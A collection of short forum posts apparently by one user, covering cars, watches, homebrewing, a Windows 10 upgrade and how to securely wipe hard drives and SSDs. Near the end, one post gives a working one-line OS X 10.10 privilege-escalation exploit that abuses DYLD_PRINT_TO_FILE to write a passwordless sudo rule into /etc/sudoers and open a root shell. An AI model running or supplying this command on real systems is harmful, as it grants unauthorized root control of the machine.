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The caterham. I don't keep up with cars enough to realize that wasn't just a classic lotus. Still cool.
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nice lotus
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that looks ok colin...
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I haven't tried that, but I love the steelcase leaps the gov't has everywhere.
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I dunno, my 45mm watch wears just fine. I think it's just whatever you like.
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Major Forum Software Upgrade - August 5, 2015
grawk replied to tkam's topic in General Announcements
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Major Forum Software Upgrade - August 5, 2015
grawk replied to tkam's topic in General Announcements
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Windows 10 - Who's upgrading tomorrow?
grawk replied to postjack's topic in GoRedwings19's Computer Help Hotline
cool, that's a good birthday gift for you from microsoft -
#5 and #2
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because twice makes sure every byte of the disk gets rewritten. if it was encrypted from the beginning, then just format it and you're safe.
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do this from the command line: diskutil randomDisk 2 /dev/diskN That should be thorough enough that even commercial tools won't get at the data. Encryption would work fine if you started with it on. The reason it doesn't help in this case is the same reason overwriting is a pain. SSDs don't like to overwrite the data, they just write to new locations and change the pointer.
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The yellow cobra and the 64 speedster are my jam
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I agree, it was fantastic. I need to brew my thai belgian again one of these days. Kefir Lime/Lemongrass/Coriander wheat
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Bonkys, a local place that makes their own
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Are too fast for pictures but lemongrass Thai basil ice cream.
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I don't know how to do it with the tools you have available. Any 3 pass tool that doesn't write the same thing all 3 times is going to be fine. I'd do the 19 hour wipe, or use DBAN or something like that. Here's an article on options: http://gizmodo.com/5494427/leave-no-trace-how-to-completely-erase-your-hard-drives-ssds-and-thumb-drives
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3 times, 0, 1, then random would be secure enough. What I do is just pull out the drives, and recycle the computer without the drive. I have a drawer full of old hard drives.
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I think only the first gen ones will come close, the inside gets smaller with every new gen.
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I had a fuse driver 5 years ago
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That is true by default. The key is that variable and any setuid binary.
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no, it was intended for anyone running 10.10 who is security conscious.
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echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s Gives a root prompt without a password on 10.10.x (works on 10.10.5 on my computer)
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I think you should get him something other than a nice watch if he doesn't appreciate them.